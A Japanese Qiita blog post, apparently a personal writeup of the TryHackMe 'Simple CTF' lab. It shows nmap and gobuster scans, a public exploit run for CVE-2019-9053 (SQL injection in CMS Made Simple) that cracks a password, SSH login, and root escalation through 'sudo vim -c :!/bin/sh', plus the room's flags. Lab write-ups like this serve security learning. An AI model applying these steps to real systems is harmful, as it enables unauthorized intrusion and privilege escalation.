LoginSignup
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

はじめての記事投稿
Qiita Engineer Festa20242024年7月17日まで開催中!
@TUDANUMA

[TryHackMe] Simple CTF #Writeup

Last updated at Posted at 2024-07-09

注意

初投稿です。個人的な備忘録です。

How many services are running under port 1000?

nmapで稼働中のサービスを調べる。

$nmap -A 10.10.119.50
--------
Starting Nmap 7.60 ( https://nmap.org ) at 2024-07-09 02:59 BST
Nmap scan report for ip-10-10-119-50.eu-west-1.compute.internal (10.10.119.50)
Host is up (0.00046s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.87.57
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/ /openemr-5_0_1_3 
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (EdDSA)
MAC Address: 02:BF:6D:85:80:73 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.13 (92%), Linux 3.8 (92%), Crestron XPanel control system (89%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (86%), Linux 2.6.32 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms ip-10-10-119-50.eu-west-1.compute.internal (10.10.119.50)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.34 seconds

ftpとhttpの2つ

2

What is running on the higher port?

先ほどのnmapにより、2222番ポートでsshが稼働しているのが確認できた。

ssh

What's the CVE you're using against the application?

80番ポートでhttpが動いているのでブラウザで確認。
apacheで動いているらしい。(画像省略)

gobusterで隠れディレクトリを探す。

$gobuster dir -u http://10.10.119.50 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.119.50
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2024/07/09 03:06:33 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/simple (Status: 301)
===============================================================
2024/07/09 03:06:34 Finished
===============================================================

simpleが気になるので、アクセス。ページのフッターに、
"This site is powered by CMS Made Simple version 2.2.8"と記載あり。

CMS Made Simple version 2.2.8の脆弱性をググってみる。

でてきた

CVE-2019-9053

To what kind of vulnerability is the application vulnerable?

詳細を見てみるとSQLインジェクションらしいことがわかる。
そのままSQL Injectionが答えかと思いきや、四文字が答えらしい。

sqli

What's the password?

git cloneでエクスプロイトをゲットし、

python3 exploit.py -u http://10.10.119.50/simple --crack -w /usr/share/wordlists/dirb/common.txt

を実行すると、

[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret

ユーザー名とパスワードをゲットした。

secret

Where can you login with the details obtained?

ユーザー名とパスワードをゲットしたので先ほど調べた
2222番ポートで動いているsshを使うんだろな。

ssh

What's the user flag?

$ssh -p 2222 mitch@10.10.119.50

※ポート番号を指定すること
パスワードを入力すると、無事ログインできた。
user.txtを見つけた。

G00d j0b, keep up!

Is there any other user in the home directory? What's its name?

ディレクトリを一階層上がるともう一人ユーザーがいるらしい。

sunbath

What can you leverage to spawn a privileged shell?

$sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

vimだけ権限を持っている。

vim

What's the root flag?

GTFOBinsから権限昇格の方法を探す。

$sudo vim -c ':!/bin/sh'

rootに昇格できた。

#whoami
root
# find / -name root.txt
find: \u2018/run/user/108/gvfs\u2019: Permission denied
/root/root.txt
# cd /root 
# cat *
W3ll d0n3. You made it!

W3ll d0n3. You made it!

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?